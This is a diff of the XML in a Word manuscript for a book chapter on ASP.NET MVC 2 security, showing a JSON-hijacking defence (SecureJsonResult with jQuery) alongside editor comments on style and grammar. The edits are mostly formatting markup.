+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ContentType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3273,8 +5003,12 @@
       </w:pPr>
       <w:r>
         <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
         <w:t>else</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3294,7 +5028,24 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>response.ContentType = "application/json";</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>response.ContentType</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = "application/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>json</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>";</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3312,7 +5063,22 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>if (ContentEncoding != null)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ContentEncoding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> != null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3333,7 +5099,24 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>response.ContentEncoding = ContentEncoding;</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>response.ContentEncoding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ContentEncoding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3351,7 +5134,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>if (Data != null)</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (Data != null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3372,19 +5162,43 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>var enumerable = Data as IEnumerable;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>if (enumerable != null)</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> enumerable = Data as </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IEnumerable</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>if</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (enumerable != null)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3438,19 +5252,61 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>var serializer = new JavaScriptSerializer();</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>response.Write(serializer.Serialize(Data));</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>serializer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = new </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>JavaScriptSerializer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>();</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>response.Write</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>serializer.Serialize</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(Data));</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3482,8 +5338,25 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:r>
-        <w:t>The downside to this approach is that we must use this "d" variable in our JavaScript code.  Listing 11.15 shows consuming jQuery.</w:t>
+      <w:commentRangeStart w:id="17"/>
+      <w:r>
+        <w:t xml:space="preserve">The downside to this approach is that we must use this "d" variable in our JavaScript code.  Listing 11.15 shows consuming </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>jQuery</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="17"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="17"/>
       </w:r>
     </w:p>
     <w:p>
@@ -3491,86 +5364,243 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.15 Consuming SecureJsonResult with jQuery</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>$(function() {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">$.getJSON('/post/getsecurejson', </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-        <w:t>function(data) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>var options = '';</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>for (var i = 0; i &lt; data.d.length; i++) {</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>options += '&lt;option value="' +</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-      </w:r>
-      <w:r>
-        <w:tab/>
-        <w:t>data.d[i].Id + '"&gt;' + data.d[i].Title +</w:t>
+        <w:t xml:space="preserve">Listing 11.15 </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="18"/>
+      <w:r>
+        <w:t xml:space="preserve">Consuming </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>SecureJsonResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>jQuery</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="18"/>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana"/>
+          <w:b w:val="0"/>
+          <w:vanish/>
+          <w:color w:val="000000"/>
+        </w:rPr>
+        <w:commentReference w:id="18"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>$(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>function</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>() {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>$.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getJSON</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>('/post/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>getsecurejson</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">', </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>function</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>(data) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> options = '';</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>for</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>var</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> = 0; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> &lt; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>data.d.length</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">; </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>++) {</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>options</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> += '&lt;option value="' +</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>data.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">].Id + '"&gt;' + </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>data.d</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>i</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>].Title +</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  #1</w:t>
@@ -3612,7 +5642,15 @@
       </w:r>
       <w:r>
         <w:tab/>
-        <w:t>$('#secure').html(options);</w:t>
+        <w:t>$('#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>secure'</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>).html(options);</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3637,7 +5675,15 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 Using the d variable</w:t>
+        <w:t xml:space="preserve">#1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Using</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> the d variable</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -3645,7 +5691,15 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">Using this technique we can still use GETs to retrieve our JSON data, but the JSON is secure because it is never just an array - any arrays are wrapped in a "d" variable.  But we must be sure to access values through the "d" variable </w:t>
+        <w:t xml:space="preserve">Using this technique we can still use </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>GETs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to retrieve our JSON data, but the JSON is secure because it is never just an array - any arrays are wrapped in a "d" variable.  But we must be sure to access values through the "d" variable </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3661,9 +5715,18 @@
       <w:pPr>
         <w:pStyle w:val="Body"/>
       </w:pPr>
+      <w:commentRangeStart w:id="19"/>
       <w:r>
         <w:t>We recommend using the default behavior of using HTTP POST request to retrieve JSON data.  If that becomes a problem, developers can choose to switch to another technique.</w:t>
       </w:r>
+      <w:commentRangeEnd w:id="19"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="19"/>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3678,36 +5741,89 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">No application can ever be totally secure, but in this chapter we learned about several vulnerabilities, and how we can protect our ASP.NET MVC 2 applications.  We explored using </w:t>
-      </w:r>
-      <w:r>
-        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">No application can ever be totally secure, but in this chapter we learned about several vulnerabilities, and how we can protect our ASP.NET MVC 2 applications.  </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="20"/>
+      <w:r>
+        <w:t xml:space="preserve">We explored using </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="20"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="20"/>
+      </w:r>
+      <w:r>
         <w:t xml:space="preserve">the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> to enforce authentication and authorization on actions.  We understood cross site scripting and learned to never trust user input and HTML encode all output.  Cross site request forgeries are neutered when the </w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to enforce authentication and authorization on actions.  We understood </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>cross site</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> scripting and learned to never trust user input and </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="21"/>
+      <w:r>
+        <w:t xml:space="preserve">HTML encode all output.  </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="21"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="21"/>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Cross site</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> request forgeries are neutered when the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>ValidateAntiForgerTokenAttribute</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> is used to verify that input is coming from trusted forms.  We learned how ASP.NET MVC 2 helps protect against JSON hijacking and how to explicity work-around the changes to </w:t>
-      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> is used to verify that input is coming from trusted forms.  We learned how ASP.NET MVC 2 helps protect against JSON hijacking and how to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>explicity</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> work-around the changes to </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>JsonResult</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -3730,7 +5846,7 @@
         <w:numRestart w:val="eachSect"/>
       </w:footnotePr>
       <w:pgSz w:w="10627" w:h="13320" w:code="13"/>
-      <w:pgMar w:top="1800" w:right="1080" w:bottom="1080" w:left="1987" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="1800" w:right="1080" w:bottom="1080" w:left="1987" w:gutter="0"/>
       <w:pgNumType w:start="1" w:chapSep="period"/>
       <w:cols w:space="0"/>
       <w:noEndnote/>
@@ -3740,8 +5856,469 @@
 </w:document>
 </file>
 
+<file path=word/comments.xml><?xml version="1.0" encoding="utf-8"?>
+<w:comments xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+  <w:comment w:id="0" w:author="Katharine Osborne" w:date="2010-02-06T23:18:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Try not to repeat the same word over and over.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>There is some odd capitalization here.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="1" w:author="Katharine Osborne" w:date="2010-02-06T23:20:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>This is bland and obvious. Is there any way to spice this up? Why is it so important?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Ideally, thesis statements should pack a punch that will hook readers into the chapter.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="2" w:author="Katharine Osborne" w:date="2010-02-06T23:24:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Is the user authenticated or the username and password? If the former then, “he is authenticated” or “the user is authenticated”. If the latter, the “they are authenticated”.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="3" w:author="Katharine Osborne" w:date="2010-02-06T23:25:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Here “it” again refers to the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>the</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> user. I assume this was meant to be the resource instead. Rewrite for proper agreement.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="4" w:author="Katharine Osborne" w:date="2010-02-06T23:26:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Should be code font.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="5" w:author="Katharine Osborne" w:date="2010-02-06T23:38:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>What do these do? Maybe this information might be better off in a table. What do you think?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:t>Would it be possible to see any of these in an example?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="6" w:author="Katharine Osborne" w:date="2010-02-06T23:39:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>This is hyphenated up above. Which way is correct?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="7" w:author="Katharine Osborne" w:date="2010-02-06T23:40:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Dashes used to show a pause should be </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>em</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> dashes (type the dash character twice to get an </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>em</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> dash in Word). Just FYI.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="8" w:author="Katharine Osborne" w:date="2010-02-06T23:42:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>Shouldn’t the reader already know this, or am I missing something?</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="9" w:author="Katharine Osborne" w:date="2010-02-06T23:46:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>I love this bit. It’s a very strong thesis statement. The second sentence makes it decidedly not bland.</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="10" w:author="Katharine Osborne" w:date="2010-02-06T23:47:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+        </w:rPr>
+        <w:annotationRef/>
+      </w:r>
+      <w:r>
+        <w:t>http://mng.bz/Z3V5</w:t>
+      </w:r>
+    </w:p>
+  </w:comment>
+  <w:comment w:id="11" w:author="Katharine Osborne" w:date="2010-02-06T23:48:00Z" w:initials="KO">
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="CommentText"/>
+      </w:pPr>
+      <w:r>
